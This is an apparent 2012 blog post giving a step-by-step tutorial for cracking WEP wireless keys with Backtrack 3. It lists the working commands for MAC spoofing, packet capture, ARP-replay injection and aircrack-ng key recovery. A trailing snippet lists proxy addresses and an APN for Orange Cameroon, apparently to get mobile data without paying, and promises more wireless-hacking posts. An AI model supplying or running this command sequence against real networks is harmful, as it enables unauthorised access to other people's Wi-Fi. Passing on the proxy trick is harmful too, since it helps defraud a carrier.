Thursday 1 November 2012

Wireless Hacking tutorialusing BacktrackWireless Hacking withbacktrack 3 is easy to do , inthis article I’d like to guide youin Wireless hacking withbacktrack 3. This tutorial ismade based on some requestsby my subscribers , they’vebeen familiar enough withBacktrack 3 , that’s why Imade this Wireless Hackingwith backtrack 3 tutorial. Inorder to start the wirelesshacking , you need to makesure that you have met theserequirements :- Backtrack 3 or newer release- 1 wireless router- Laptop with wireless cardAnd let the hack begins :In order to crack a WEP keyyou must have a large numberof encrypted packets to workwith. This is an unavoidablerequirement if you wish to besuccessful. The best way toget a large number of packetsis to perform an ARP requestre injection attack (otherwiseknown as attack -3). In orderto do this attack and getresults there must be a clientalready authenticated with theAP, aor connecting to the AP.***********************************************************************Here are some things you needto know before you getconfusedWhen you see this (device) or(bssid) you DON’T put the ( )!!!(device) = Your wireless card*can be seen by typing iniwconfig EG: eth0, eth1, ath0,ath1(bssid) = This is the consentingcomputers bssid *when youstart airodump-ng if there is aAP in range it will show up onthe left side will look similar to00:11:22:33:44:55************************************************************************Now before we start we needto make a txt file in the homefolder. On the desktop you willsee 2 icons home and system.Double click the home icon, rigtclick the blank white area andselect create new Txt Filename it Exidous or what everyou want! click ok, now closethe window.Ok let’s start!Commands | Meaning====================*open up 3 shell konsoles byclicking the little black boxnext to the start button.* The first thing were going todo is stop the device akaethernet cardairmon-ng stop ath0* Now were going to put thewireless card down, so we canfake a mac adress (to seeavailable wireless cards type,iwconfigifconfig (device) down* Ok now just to make thingssimpler, so we don’t have tohunt down what our Macaddress ismacchanger –mac00:11:22:33:44:55 (device)* Now were going to start thewireless card *make it listenfor AP’sairmon-ng start (device)* Lets start seeing what AP’sare thereairodump-ng (device)* After you see all the AP’sexecute the following commandto stop it and copy the bssidCTRL+C Copy bssid ofconsenting computer* Now on to the consentingcomputer’s AP (were listeningin for authentication packetsairodump-ng -c 6 -w Exidous –bssid (Bssid) (device)* Lets get on with making moreData, and start the injectionprocessaireplay-ng -l 0 -a (bssid) -h00:11:22:33:44:55 (device)* Now were going to inject therouter ***this sometimes takesa while to actually inject!aireplay-ng -3 -b (bssid) -h00:11:22:33:44:55 (device)* On to cracking the key,***AFTER GETTING AT LEAST5,000 Data/IV’s for 64 bitencryption / AFTER GETTINGAT LEAST 10,000 Data/IV’sfor 128 bit encryptionaircrack-ng -n 64 –bssid(bssid) Exidous-01.cap* Once you crack the wep keyyou wright it down, and rebootto windows. Now put it in theusername and the passwordwith out the :EG: Wep Key = 33:C7:C6:09:30When Entered into usernameand password it will look likethis. 33C7C60930Get backtrack linux at -http://www.backtrack-

NEW PROXIES FOR ORANGE CAMEROON. ip-209.097.221.088, 176.031.222.034, 173.208.197.229. port-80 homepage-m.wikipedia.org apn- orangecmgprs. enjoy... next on blog is mtn and ways to hack wireless.

ORANGE CAMEROON PROXIES